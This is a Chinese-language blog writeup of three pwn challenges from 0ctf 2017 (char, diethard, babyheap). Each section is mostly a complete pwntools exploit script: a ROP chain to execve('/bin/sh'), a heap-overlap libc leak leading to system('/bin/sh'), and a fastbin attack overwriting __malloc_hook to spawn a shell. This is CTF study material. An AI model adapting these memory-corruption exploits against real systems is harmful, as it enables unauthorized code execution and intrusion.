<!DOCTYPE html>
<html>
<head>
    

    

    



    <meta charset="utf-8">
    
    
    
    <title>0ctf 2017 writeup | DazzleP&#39;s Blog | A simple record place</title>
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
    
    <meta name="theme-color" content="#FF0000">
    
    
    <meta name="keywords" content="ctf,pwn,writeup">
    <meta name="description" content="这次0ctf自己做了俩pwn，和西电dalao一块做了一个，总体来说还是被虐惨了">
<meta name="keywords" content="ctf,pwn,writeup">
<meta property="og:type" content="article">
<meta property="og:title" content="0ctf 2017 writeup">
<meta property="og:url" content="http://blog.dazzlepppp.cn/2017/03/24/0ctf-2017-writeup/index.html">
<meta property="og:site_name" content="DazzleP&#39;s Blog">
<meta property="og:description" content="这次0ctf自己做了俩pwn，和西电dalao一块做了一个，总体来说还是被虐惨了">
<meta property="og:updated_time" content="2017-05-04T15:12:16.909Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="0ctf 2017 writeup">
<meta name="twitter:description" content="这次0ctf自己做了俩pwn，和西电dalao一块做了一个，总体来说还是被虐惨了">
    
    <link rel="shortcut icon" href="/img/avatar_maki.png">
    <link rel="stylesheet" href="//unpkg.com/hexo-theme-material-indigo@latest/css/style.css">
    <script>window.lazyScripts=[]</script>
</head>

<body>
    <div id="loading" class="active"></div>

    <aside id="menu" class="hide" >
  <div class="inner flex-row-vertical">
    <a href="javascript:;" class="header-icon waves-effect waves-circle waves-light" id="menu-off">
        <i class="icon icon-lg icon-close"></i>
    </a>
    <div class="brand-wrap" style="background-image:url(/)">
      <div class="brand">
        <a href="/" class="avatar waves-effect waves-circle waves-light">
          <img src="/img/avatar_maki.png">
        </a>
        <hgroup class="introduce">
          <h5 class="nickname">DazzleP</h5>
          <a href="mailto:dazzlepppp@outlook.com" title="dazzlepppp@outlook.com" class="mail">dazzlepppp@outlook.com</a>
        </hgroup>
      </div>
    </div>
    <div class="scroll-wrap flex-col">
      <ul class="nav">
        
            <li class="waves-block waves-effect">
              <a href="/"  >
                <i class="icon icon-lg icon-home"></i>
                主页
              </a>
            </li>
        
            <li class="waves-block waves-effect">
              <a href="/archives"  >
                <i class="icon icon-lg icon-archives"></i>
                Archives
              </a>
            </li>
        
            <li class="waves-block waves-effect">
              <a href="/tags"  >
                <i class="icon icon-lg icon-tags"></i>
                Tags
              </a>
            </li>
        
            <li class="waves-block waves-effect">
              <a href="https://github.com/dazzlepppp" target="_blank" >
                <i class="icon icon-lg icon-github"></i>
                Github
              </a>
            </li>
        
            <li class="waves-block waves-effect">
              <a href="http://www.weibo.com/2722036022" target="_blank" >
                <i class="icon icon-lg icon-weibo"></i>
                Weibo
              </a>
            </li>
        
      </ul>
    </div>
  </div>
</aside>

    <main id="main">
        <header class="top-header" id="header">
    <div class="flex-row">
        <a href="javascript:;" class="header-icon waves-effect waves-circle waves-light on" id="menu-toggle">
          <i class="icon icon-lg icon-navicon"></i>
        </a>
        <div class="flex-col header-title ellipsis">0ctf 2017 writeup</div>
        
        <div class="search-wrap" id="search-wrap">
            <a href="javascript:;" class="header-icon waves-effect waves-circle waves-light" id="back">
                <i class="icon icon-lg icon-chevron-left"></i>
            </a>
            <input type="text" id="key" class="search-input" autocomplete="off" placeholder="Search">
            <a href="javascript:;" class="header-icon waves-effect waves-circle waves-light" id="search">
                <i class="icon icon-lg icon-search"></i>
            </a>
        </div>
        
        
        <a href="javascript:;" class="header-icon waves-effect waves-circle waves-light" id="menuShare">
            <i class="icon icon-lg icon-share-alt"></i>
        </a>
        
    </div>
</header>
<header class="content-header post-header">

    <div class="container fade-scale">
        <h1 class="title">0ctf 2017 writeup</h1>
        <h5 class="subtitle">
            
                <time datetime="2017-03-24T15:02:47.000Z" itemprop="datePublished" class="page-time">
  2017-03-24
</time>


            
        </h5>
    </div>

    


</header>


<div class="container body-wrap">
    
    <aside class="post-widget">
        <nav class="post-toc-wrap" id="post-toc">
            <h4>TOC</h4>
            <ol class="post-toc"><li class="post-toc-item post-toc-level-2"><a class="post-toc-link" href="#char"><span class="post-toc-number">1.</span> <span class="post-toc-text">char</span></a></li><li class="post-toc-item post-toc-level-2"><a class="post-toc-link" href="#diethard"><span class="post-toc-number">2.</span> <span class="post-toc-text">diethard</span></a></li><li class="post-toc-item post-toc-level-2"><a class="post-toc-link" href="#babyheap"><span class="post-toc-number">3.</span> <span class="post-toc-text">babyheap</span></a></li></ol>
        </nav>
    </aside>
    
<article id="post-0ctf-2017-writeup"
  class="post-article article-type-post fade" itemprop="blogPost">

    <div class="post-card">
        <h1 class="post-card-title">0ctf 2017 writeup</h1>
        <div class="post-meta">
            <time class="post-time" title="2017-03-24 23:02:47" datetime="2017-03-24T15:02:47.000Z"  itemprop="datePublished">2017-03-24</time>

            


            
<span id="busuanzi_container_page_pv" title="文章总阅读量" style='display:none'>
    <i class="icon icon-eye icon-pr"></i><span id="busuanzi_value_page_pv"></span>
</span>


            

        </div>
        <div class="post-content" id="post-content" itemprop="postContent">
            <h2 id="char"><a href="#char" class="headerlink" title="char"></a>char</h2><p>很明显的栈溢出，但是程序会检查输入是否全为可打印字符，比较良心的是程序把一个libc映射到0x5555e000这个段上，算是让我们有点gadget可用<br>因为程序通过<code>strlen()</code>获取输入长度，所以我们可以在输入中间加上<code>&#39;\x00&#39;</code>来截断<code>strlen()</code>，这样只需要<code>&#39;\x00&#39;</code>之前的部分全为可打印字符，之后的payload不受影响<br>只需要找到合适的gadget让栈跳到后方返回就可以了</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div><div class="line">24</div><div class="line">25</div><div class="line">26</div><div class="line">27</div><div class="line">28</div><div class="line">29</div><div class="line">30</div><div class="line">31</div><div class="line">32</div><div class="line">33</div><div class="line">34</div><div class="line">35</div><div class="line">36</div><div class="line">37</div><div class="line">38</div><div class="line">39</div><div class="line">40</div><div class="line">41</div><div class="line">42</div><div class="line">43</div><div class="line">44</div><div class="line">45</div><div class="line">46</div><div class="line">47</div><div class="line">48</div><div class="line">49</div><div class="line">50</div><div class="line">51</div><div class="line">52</div><div class="line">53</div><div class="line">54</div><div class="line">55</div><div class="line">56</div><div class="line">57</div><div class="line">58</div><div class="line">59</div><div class="line">60</div><div class="line">61</div><div class="line">62</div><div class="line">63</div><div class="line">64</div><div class="line">65</div><div class="line">66</div><div class="line">67</div><div class="line">68</div><div class="line">69</div><div class="line">70</div><div class="line">71</div><div class="line">72</div><div class="line">73</div><div class="line">74</div><div class="line">75</div></pre></td><td class="code"><pre><div class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</div><div class="line">context.log_level = <span class="string">'debug'</span></div><div class="line"></div><div class="line">base = <span class="number">0x5555e000</span></div><div class="line"></div><div class="line"><span class="comment">#0x0001706b : pop eax ; pop ebx ; pop esi ; pop edi ; pop ebp ; ret</span></div><div class="line">int80 = <span class="number">0x00B7E36</span></div><div class="line">pop5_ret = <span class="number">0x0001706b</span></div><div class="line">ret80 = <span class="number">0x00132d35</span></div><div class="line">ret52 = <span class="number">0x00004234</span></div><div class="line">pop4_ret10 = <span class="number">0x00017e76</span></div><div class="line">addesp9c_ret = <span class="number">0x000e3cee</span></div><div class="line">addesp98_pop_ret = <span class="number">0x0011cf7a</span></div><div class="line">mov_eax_ecx = <span class="number">0x00148251</span></div><div class="line">xchg_esp_eax = <span class="number">0x000e6d62</span></div><div class="line">add_esp1c_ret = <span class="number">0x00115f35</span></div><div class="line"></div><div class="line">p = process(<span class="string">'./char_patched'</span>)</div><div class="line"><span class="comment">#p = remote('202.120.7.214', 23222)</span></div><div class="line"></div><div class="line">ebx_ret = <span class="number">0x0007dce9</span></div><div class="line">edx_ecx_eax_ret = <span class="number">0x000f277f</span></div><div class="line"></div><div class="line">scanf_plt = <span class="number">0x08048540</span></div><div class="line">pop2_ret = <span class="number">0x804889a</span></div><div class="line">s2400 = <span class="number">0x804894C</span></div><div class="line">data = <span class="number">0x804A03C</span></div><div class="line">system_addr = <span class="number">0x003EED0</span> + base</div><div class="line">execve_addr = <span class="number">0x0003ECF2</span> + base</div><div class="line">eax_ret = <span class="number">0x0016a7d4</span> + base</div><div class="line">pop3_ret = <span class="number">0x8048899</span></div><div class="line">binsh = <span class="number">0x556bb7ec</span></div><div class="line"></div><div class="line">main_addr = <span class="number">0x08048693</span></div><div class="line">write_plt = <span class="number">0x8048520</span></div><div class="line">write_got = <span class="number">0x804A030</span></div><div class="line">puts_plt = <span class="number">0x80484B0</span></div><div class="line">scanf_got = <span class="number">0x804A038</span></div><div class="line">strcpy_got = <span class="number">0x0804A010</span></div><div class="line">strcpy_plt = <span class="number">0x080484A0</span></div><div class="line">libc_start_main_got = <span class="number">0x804A00C</span> + <span class="number">4</span></div><div class="line">edx_ret = <span class="number">0x00001a9e</span> + base</div><div class="line">ecx_ret = <span class="number">0x000cae3b</span> + base</div><div class="line"></div><div class="line">inc_eax_ret = <span class="number">0x00026a9b</span> + base</div><div class="line"></div><div class="line">log.info(hex(write_plt))</div><div class="line"></div><div class="line">payload = <span class="string">''</span></div><div class="line">payload += <span class="string">'A'</span> * <span class="number">28</span></div><div class="line">payload += p32(add_esp1c_ret + base)</div><div class="line">payload += p32(mov_eax_ecx + base)</div><div class="line">payload += p32(xchg_esp_eax + base)</div><div class="line">payload += <span class="string">'\x00'</span> * <span class="number">3</span></div><div class="line">payload += p32(<span class="number">0xdeadbeef</span>)</div><div class="line">payload += p32(<span class="number">0xdeadbeef</span>) * <span class="number">5</span></div><div class="line">payload += p32(ebx_ret + base)</div><div class="line">payload += p32(binsh)</div><div class="line">payload += p32(edx_ret)</div><div class="line">payload += p32(<span class="number">0x00</span>)</div><div class="line">payload += p32(ecx_ret)</div><div class="line">payload += p32(<span class="number">0x00</span>)</div><div class="line"></div><div class="line"><span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">11</span>):</div><div class="line">	payload += p32(inc_eax_ret)</div><div class="line"></div><div class="line">payload += p32(int80 + base)</div><div class="line"></div><div class="line">pause()</div><div class="line"></div><div class="line">log.info(len(payload))</div><div class="line"></div><div class="line">p.recvuntil(<span class="string">'GO : ) \n'</span>)</div><div class="line">p.send(payload + <span class="string">'\n'</span>)</div><div class="line">p.interactive()</div></pre></td></tr></table></figure>
<h2 id="diethard"><a href="#diethard" class="headerlink" title="diethard"></a>diethard</h2><p>一个自己实现的内存管理系统，程序会根据申请内存的大小分配一个类似index的东西，相同index的堆块会分配到同一页，计算了一下发现index为8时，对应的对块大小集合元素最多<br>其中分配1032和2016大小的堆块会出bug，不用释放内存就出现堆块重叠了。。。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div><div class="line">24</div><div class="line">25</div><div class="line">26</div><div class="line">27</div><div class="line">28</div><div class="line">29</div><div class="line">30</div><div class="line">31</div><div class="line">32</div><div class="line">33</div><div class="line">34</div><div class="line">35</div><div class="line">36</div><div class="line">37</div><div class="line">38</div><div class="line">39</div><div class="line">40</div><div class="line">41</div><div class="line">42</div><div class="line">43</div><div class="line">44</div><div class="line">45</div><div class="line">46</div><div class="line">47</div><div class="line">48</div><div class="line">49</div><div class="line">50</div><div class="line">51</div><div class="line">52</div><div class="line">53</div><div class="line">54</div><div class="line">55</div><div class="line">56</div><div class="line">57</div><div class="line">58</div><div class="line">59</div><div class="line">60</div><div class="line">61</div><div class="line">62</div><div class="line">63</div><div class="line">64</div><div class="line">65</div><div class="line">66</div><div class="line">67</div><div class="line">68</div><div class="line">69</div><div class="line">70</div><div class="line">71</div><div class="line">72</div><div class="line">73</div><div class="line">74</div><div class="line">75</div><div class="line">76</div><div class="line">77</div><div class="line">78</div><div class="line">79</div><div class="line">80</div><div class="line">81</div><div class="line">82</div><div class="line">83</div><div class="line">84</div><div class="line">85</div><div class="line">86</div><div class="line">87</div><div class="line">88</div><div class="line">89</div><div class="line">90</div><div class="line">91</div><div class="line">92</div><div class="line">93</div><div class="line">94</div></pre></td><td class="code"><pre><div class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</div><div class="line">context.log_level = <span class="string">'info'</span></div><div class="line"></div><div class="line"><span class="function"><span class="keyword">def</span> <span class="title">New</span><span class="params">(p, length, content)</span>:</span></div><div class="line">    p.recvuntil(<span class="string">"3. Exit\n\n"</span>)</div><div class="line">    p.send(<span class="string">'1\n'</span>)</div><div class="line">    p.recvuntil(<span class="string">"Input Message Length:\n"</span>)</div><div class="line">    p.send(str(length) + <span class="string">'\n'</span>)</div><div class="line">    p.recvuntil(<span class="string">"Please Input Message:\n"</span>)</div><div class="line">    p.send(content)</div><div class="line"></div><div class="line"><span class="function"><span class="keyword">def</span> <span class="title">Delete</span><span class="params">(p, index)</span>:</span></div><div class="line">    p.recvuntil(<span class="string">"3. Exit\n\n"</span>)</div><div class="line">    p.send(<span class="string">'2\n'</span>)</div><div class="line">    p.recvuntil(<span class="string">'Which Message You Want To Delete?\n'</span>)</div><div class="line">    p.send(str(index) + <span class="string">'\n'</span>)</div><div class="line"></div><div class="line"><span class="keyword">if</span> __name__ == <span class="string">'__main__'</span>:</div><div class="line"></div><div class="line">    <span class="comment">#p = process('./diethard')</span></div><div class="line">    p = remote(<span class="string">'202.120.7.194'</span>, <span class="number">6666</span>)</div><div class="line"></div><div class="line">    New(p, <span class="number">1032</span>, <span class="string">'A\n'</span>)</div><div class="line">    New(p, <span class="number">1032</span>, <span class="string">'GGGGGGGGGGGGGGGG\n'</span>)</div><div class="line">    New(p, <span class="number">2016</span>, <span class="string">'C\n'</span>)</div><div class="line"></div><div class="line">    p.recvuntil(<span class="string">"3. Exit\n\n"</span>)</div><div class="line">    p.send(<span class="string">'2\n'</span>)</div><div class="line"></div><div class="line">    p.recvuntil(<span class="string">'2.'</span>)</div><div class="line">    data = p.recvuntil(<span class="string">'GGGGGGGGGGGGGGGG'</span>, drop = <span class="keyword">True</span>)[<span class="number">-16</span>:]</div><div class="line">    p.recvuntil(<span class="string">'Which Message You Want To Delete?\n'</span>)</div><div class="line">    p.send(str(<span class="number">6</span>) + <span class="string">'\n'</span>)</div><div class="line"></div><div class="line">    heap_addr = u64(data[:<span class="number">8</span>])</div><div class="line"></div><div class="line">    log.info(<span class="string">"heap addr: "</span> + hex(heap_addr))</div><div class="line"></div><div class="line">    Delete(p, <span class="number">2</span>)</div><div class="line">    Delete(p, <span class="number">1</span>)</div><div class="line">    Delete(p, <span class="number">0</span>)</div><div class="line"></div><div class="line">    <span class="string">'''</span></div><div class="line">    0x7fb7d3d0b800:    0x0000000000000043    0x0000000000000408</div><div class="line">    0x7fb7d3d0b810:    0x00007fb7d3d0b820    0x0000000000400976</div><div class="line">    0x7fb7d3d0b820:    0x4747474747474747    0x4747474747474747</div><div class="line">    '''</div><div class="line">    payload = <span class="string">''</span></div><div class="line">    payload += p64(<span class="number">0x43</span>)</div><div class="line">    payload += p64(<span class="number">0x408</span>)</div><div class="line">    payload += p64(<span class="number">0x000000000603280</span>)</div><div class="line">    payload += p64(<span class="number">0x400976</span>)</div><div class="line"></div><div class="line">    New(p, <span class="number">1032</span>, <span class="string">'A\n'</span>)</div><div class="line">    New(p, <span class="number">1032</span>, <span class="string">'GGGGGGGGGGGGGGGG\n'</span>)</div><div class="line">    New(p, <span class="number">2016</span>, payload + <span class="string">'\n'</span>)</div><div class="line"></div><div class="line">    p.recvuntil(<span class="string">"3. Exit\n\n"</span>)</div><div class="line">    p.send(<span class="string">'2\n'</span>)</div><div class="line"></div><div class="line">    p.recvuntil(<span class="string">'1. '</span>)</div><div class="line"></div><div class="line">    libc_start_main_addr = u64(p.recvn(<span class="number">8</span>))</div><div class="line">    log.info(<span class="string">'__libc_start_main() addr: '</span> + hex(libc_start_main_addr))</div><div class="line"></div><div class="line">    p.recvuntil(<span class="string">'Which Message You Want To Delete?\n'</span>)</div><div class="line">    p.send(str(<span class="number">6</span>) + <span class="string">'\n'</span>)</div><div class="line"></div><div class="line">    <span class="comment">#libc = ELF('./local.libc64')</span></div><div class="line">    libc = ELF(<span class="string">'./libc.so'</span>)</div><div class="line"></div><div class="line">    offset_libc_start_main = libc.symbols[<span class="string">'__libc_start_main'</span>]</div><div class="line">    offset_system = libc.symbols[<span class="string">'system'</span>]</div><div class="line">    offset_binsh = next(libc.search(<span class="string">'/bin/sh'</span>))</div><div class="line"></div><div class="line">    libc_base = libc_start_main_addr - offset_libc_start_main</div><div class="line">    system_addr = libc_base + offset_system</div><div class="line">    binsh_addr = libc_base + offset_binsh</div><div class="line"></div><div class="line">    Delete(p, <span class="number">2</span>)</div><div class="line">    Delete(p, <span class="number">1</span>)</div><div class="line">    Delete(p, <span class="number">0</span>)</div><div class="line"></div><div class="line">    payload = <span class="string">''</span></div><div class="line">    payload += p64(<span class="number">0x43</span>)</div><div class="line">    payload += p64(<span class="number">0x408</span>)</div><div class="line">    payload += p64(binsh_addr)</div><div class="line">    payload += p64(system_addr)</div><div class="line"></div><div class="line">    New(p, <span class="number">1032</span>, <span class="string">'A\n'</span>)</div><div class="line">    New(p, <span class="number">1032</span>, <span class="string">'GGGGGGGGGGGGGGGG\n'</span>)</div><div class="line">    New(p, <span class="number">2016</span>, payload + <span class="string">'\n'</span>)</div><div class="line"></div><div class="line">    p.interactive()</div></pre></td></tr></table></figure>
<h2 id="babyheap"><a href="#babyheap" class="headerlink" title="babyheap"></a>babyheap</h2><p>任意字节的堆溢出，但是用的<code>calloc()</code>，申请对块时会清空推块内容，不好leak，后来使用extend chunk的方法产生堆块重叠，释放一个被覆盖的堆块来leak main_arena<br>之后决定利用unsort bin attack，修改<code>global_max_fast</code>位<code>main_arena</code>指针，这样之后所有大小堆块都会被当作fast chunk来对待<br>西电dalao在题目给的libc里发现一个离<code>__malloc_hook</code>很近地方的值为0x300，利用fastbin attack将堆块分配到那，然后修改<code>__malloc_hook</code>为libc中<code>execve(&quot;/bin/sh&quot;)</code>的one-gadget来getshell<br>这里就贴一个我本机跑起来的exp</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div><div class="line">24</div><div class="line">25</div><div class="line">26</div><div class="line">27</div><div class="line">28</div><div class="line">29</div><div class="line">30</div><div class="line">31</div><div class="line">32</div><div class="line">33</div><div class="line">34</div><div class="line">35</div><div class="line">36</div><div class="line">37</div><div class="line">38</div><div class="line">39</div><div class="line">40</div><div class="line">41</div><div class="line">42</div><div class="line">43</div><div class="line">44</div><div class="line">45</div><div class="line">46</div><div class="line">47</div><div class="line">48</div><div class="line">49</div><div class="line">50</div><div class="line">51</div><div class="line">52</div><div class="line">53</div><div class="line">54</div><div class="line">55</div><div class="line">56</div><div class="line">57</div><div class="line">58</div><div class="line">59</div><div class="line">60</div><div class="line">61</div><div class="line">62</div><div class="line">63</div><div class="line">64</div><div class="line">65</div><div class="line">66</div><div class="line">67</div><div class="line">68</div><div class="line">69</div><div class="line">70</div><div class="line">71</div><div class="line">72</div><div class="line">73</div><div class="line">74</div><div class="line">75</div><div class="line">76</div><div class="line">77</div><div class="line">78</div><div class="line">79</div><div class="line">80</div><div class="line">81</div><div class="line">82</div><div class="line">83</div><div class="line">84</div><div class="line">85</div><div class="line">86</div><div class="line">87</div><div class="line">88</div><div class="line">89</div><div class="line">90</div><div class="line">91</div><div class="line">92</div><div class="line">93</div><div class="line">94</div><div class="line">95</div><div class="line">96</div><div class="line">97</div><div class="line">98</div><div class="line">99</div><div class="line">100</div><div class="line">101</div><div class="line">102</div><div class="line">103</div><div class="line">104</div><div class="line">105</div><div class="line">106</div><div class="line">107</div><div class="line">108</div><div class="line">109</div><div class="line">110</div><div class="line">111</div><div class="line">112</div><div class="line">113</div><div class="line">114</div><div class="line">115</div><div class="line">116</div><div class="line">117</div><div class="line">118</div><div class="line">119</div><div class="line">120</div><div class="line">121</div><div class="line">122</div><div class="line">123</div></pre></td><td class="code"><pre><div class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</div><div class="line">context.log_level = <span class="string">'info'</span></div><div class="line"></div><div class="line"><span class="function"><span class="keyword">def</span> <span class="title">New</span><span class="params">(p, size)</span>:</span></div><div class="line">    p.recvuntil(<span class="string">'Command: '</span>)</div><div class="line">    p.send(<span class="string">'1\n'</span>)</div><div class="line">    p.recvuntil(<span class="string">'Size: '</span>)</div><div class="line">    p.send(str(size) + <span class="string">'\n'</span>)</div><div class="line"></div><div class="line"><span class="function"><span class="keyword">def</span> <span class="title">Fill</span><span class="params">(p, idx, size, content)</span>:</span></div><div class="line">    p.recvuntil(<span class="string">'Command: '</span>)</div><div class="line">    p.send(<span class="string">'2\n'</span>)</div><div class="line">    p.recvuntil(<span class="string">'Index: '</span>)</div><div class="line">    p.send(str(idx) + <span class="string">'\n'</span>)</div><div class="line">    p.recvuntil(<span class="string">'Size: '</span>)</div><div class="line">    p.send(str(size) + <span class="string">'\n'</span>)</div><div class="line">    p.recvuntil(<span class="string">'Content: '</span>)</div><div class="line">    p.send(content)</div><div class="line"></div><div class="line"><span class="function"><span class="keyword">def</span> <span class="title">Free</span><span class="params">(p, idx)</span>:</span></div><div class="line">    p.recvuntil(<span class="string">'Command: '</span>)</div><div class="line">    p.send(<span class="string">'3\n'</span>)</div><div class="line">    p.recvuntil(<span class="string">'Index: '</span>)</div><div class="line">    p.send(str(idx) + <span class="string">'\n'</span>)</div><div class="line"></div><div class="line"><span class="function"><span class="keyword">def</span> <span class="title">Dump</span><span class="params">(p, idx)</span>:</span></div><div class="line">    p.recvuntil(<span class="string">'Command: '</span>)</div><div class="line">    p.send(<span class="string">'4\n'</span>)</div><div class="line">    p.recvuntil(<span class="string">'Index: '</span>)</div><div class="line">    p.send(str(idx) + <span class="string">'\n'</span>)</div><div class="line"></div><div class="line">p = process(<span class="string">'./babyheap_patched'</span>)</div><div class="line"><span class="comment">#p = remote('202.120.7.218', 2017)</span></div><div class="line"></div><div class="line">New(p, <span class="number">0x80</span>)</div><div class="line">New(p, <span class="number">0x80</span>)</div><div class="line">New(p, <span class="number">0x80</span>)<span class="comment">#</span></div><div class="line">New(p, <span class="number">0x80</span>)</div><div class="line">New(p, <span class="number">0x80</span>)<span class="comment">#</span></div><div class="line">New(p, <span class="number">0x2f0</span>)</div><div class="line">New(p, <span class="number">0x80</span>)</div><div class="line"></div><div class="line">payload = <span class="string">''</span></div><div class="line">payload += <span class="string">'A'</span> * <span class="number">0x80</span></div><div class="line">payload += p64(<span class="number">0x00</span>)</div><div class="line">payload += p64(<span class="number">0x90</span> * <span class="number">2</span> + <span class="number">1</span>)</div><div class="line"></div><div class="line">Fill(p, <span class="number">0</span>, len(payload), payload)</div><div class="line"></div><div class="line">Free(p, <span class="number">1</span>)</div><div class="line"></div><div class="line">New(p, <span class="number">0x90</span> * <span class="number">2</span> - <span class="number">0x10</span>)</div><div class="line"></div><div class="line">payload = <span class="string">''</span></div><div class="line">payload += <span class="string">'A'</span> * <span class="number">0x80</span></div><div class="line">payload += p64(<span class="number">0x00</span>)</div><div class="line">payload += p64(<span class="number">0x91</span>)</div><div class="line"></div><div class="line">Fill(p, <span class="number">1</span>, len(payload), payload)</div><div class="line"></div><div class="line">Free(p, <span class="number">2</span>)</div><div class="line"></div><div class="line">Fill(p, <span class="number">1</span>, <span class="number">0x90</span>, <span class="string">'A'</span> * <span class="number">0x90</span>)</div><div class="line"></div><div class="line">Free(p, <span class="number">4</span>)</div><div class="line"></div><div class="line">Dump(p, <span class="number">1</span>)</div><div class="line"></div><div class="line">p.recvuntil(<span class="string">'A'</span> * <span class="number">0x90</span>)</div><div class="line"></div><div class="line">main_arena = u64(p.recvn(<span class="number">8</span>))</div><div class="line">heap_addr = u64(p.recvn(<span class="number">8</span>))</div><div class="line"><span class="string">'''</span></div><div class="line">libc_base = main_arena - 0x398b58</div><div class="line">global_max_fast = libc_base + 0x39a7d0</div><div class="line">'''</div><div class="line"></div><div class="line">libc_base = main_arena - <span class="number">0x3a5678</span></div><div class="line">global_max_fast = libc_base + <span class="number">0x3a7860</span></div><div class="line"></div><div class="line">log.info(<span class="string">"main_arena : "</span> + hex(main_arena))</div><div class="line">log.info(<span class="string">"heap addr : "</span> + hex(heap_addr))</div><div class="line"></div><div class="line">payload = <span class="string">''</span></div><div class="line">payload += <span class="string">'A'</span> * <span class="number">0x80</span></div><div class="line">payload += p64(<span class="number">0x00</span>)</div><div class="line">payload += p64(<span class="number">0x91</span>)</div><div class="line">payload += p64(global_max_fast - <span class="number">0x10</span>) * <span class="number">2</span></div><div class="line"></div><div class="line">Fill(p, <span class="number">1</span>, len(payload), payload)</div><div class="line"></div><div class="line">New(p, <span class="number">0x80</span>)<span class="comment">#modify global_max_fast</span></div><div class="line"></div><div class="line">Free(p, <span class="number">5</span>)<span class="comment">#free 0x2f0 chunk(malloc before)</span></div><div class="line"></div><div class="line">New(p, <span class="number">0x2f0</span>)</div><div class="line">Free(p, <span class="number">4</span>)<span class="comment">#free 0x2f0 chunk(just malloc)</span></div><div class="line"></div><div class="line">fake_chunk_header = <span class="number">0x398617</span> + libc_base</div><div class="line"></div><div class="line">payload = <span class="string">''</span></div><div class="line">payload += <span class="string">'\x00'</span> * <span class="number">0x80</span></div><div class="line">payload += p64(<span class="number">0x00</span>)</div><div class="line">payload += p64(<span class="number">0x91</span>)</div><div class="line">payload += p64(heap_addr - <span class="number">0x120</span>)</div><div class="line">payload += p64(main_arena)</div><div class="line">payload += <span class="string">'\x00'</span> * <span class="number">0x70</span></div><div class="line">payload += p64(<span class="number">0x90</span>)</div><div class="line">payload += p64(<span class="number">0x300</span>)</div><div class="line">payload += p64(fake_chunk_header)</div><div class="line"></div><div class="line">Fill(p, <span class="number">3</span>, len(payload), payload)</div><div class="line"></div><div class="line">New(p, <span class="number">0x2f0</span>)</div><div class="line">New(p, <span class="number">0x2f0</span>)<span class="comment">#point to fake chunk</span></div><div class="line"></div><div class="line">payload = <span class="string">''</span></div><div class="line">payload += <span class="string">'\x00'</span> * <span class="number">0x4c9</span></div><div class="line">payload += p64(libc_base + <span class="number">0x00000000003F33A</span>)</div><div class="line"></div><div class="line">Fill(p, <span class="number">5</span>, len(payload), payload)</div><div class="line"></div><div class="line">p.interactive()</div></pre></td></tr></table></figure>
        </div>

        <blockquote class="post-copyright">
    <div class="content">
        
<span class="post-time">
    Last updated: <time datetime="2017-05-04T15:12:16.909Z" itemprop="dateUpdated">2017-05-04 23:12:16</time>
</span><br>


        
    </div>
    <footer>
        <a href="http://blog.dazzlepppp.cn">
            <img src="/img/avatar_maki.png" alt="DazzleP">
            DazzleP
        </a>
    </footer>
</blockquote>

        


        <div class="post-footer">
            
	<ul class="article-tag-list"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/ctf/">ctf</a></li><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/pwn/">pwn</a></li><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/writeup/">writeup</a></li></ul>


            
<div class="page-share-wrap">
    

<div class="page-share" id="pageShare">
    <ul class="reset share-icons">
      <li>
        <a class="weibo share-sns" target="_blank" href="http://service.weibo.com/share/share.php?url=http://blog.dazzlepppp.cn/2017/03/24/0ctf-2017-writeup/&title=《0ctf 2017 writeup》 — DazzleP's Blog&pic=http://blog.dazzlepppp.cn/img/avatar_maki.png" data-title="微博">
          <i class="icon icon-weibo"></i>
        </a>
      </li>
      <li>
        <a class="weixin share-sns wxFab" href="javascript:;" data-title="微信">
          <i class="icon icon-weixin"></i>
        </a>
      </li>
      <li>
        <a class="qq share-sns" target="_blank" href="http://connect.qq.com/widget/shareqq/index.html?url=http://blog.dazzlepppp.cn/2017/03/24/0ctf-2017-writeup/&title=《0ctf 2017 writeup》 — DazzleP's Blog&source=A poor bin dog from ROIS@FZU" data-title=" QQ">
          <i class="icon icon-qq"></i>
        </a>
      </li>
      <li>
        <a class="facebook share-sns" target="_blank" href="https://www.facebook.com/sharer/sharer.php?u=http://blog.dazzlepppp.cn/2017/03/24/0ctf-2017-writeup/" data-title=" Facebook">
          <i class="icon icon-facebook"></i>
        </a>
      </li>
      <li>
        <a class="twitter share-sns" target="_blank" href="https://twitter.com/intent/tweet?text=《0ctf 2017 writeup》 — DazzleP's Blog&url=http://blog.dazzlepppp.cn/2017/03/24/0ctf-2017-writeup/&via=http://blog.dazzlepppp.cn" data-title=" Twitter">
          <i class="icon icon-twitter"></i>
        </a>
      </li>
      <li>
        <a class="google share-sns" target="_blank" href="https://plus.google.com/share?url=http://blog.dazzlepppp.cn/2017/03/24/0ctf-2017-writeup/" data-title=" Google+">
          <i class="icon icon-google-plus"></i>
        </a>
      </li>
    </ul>
 </div>



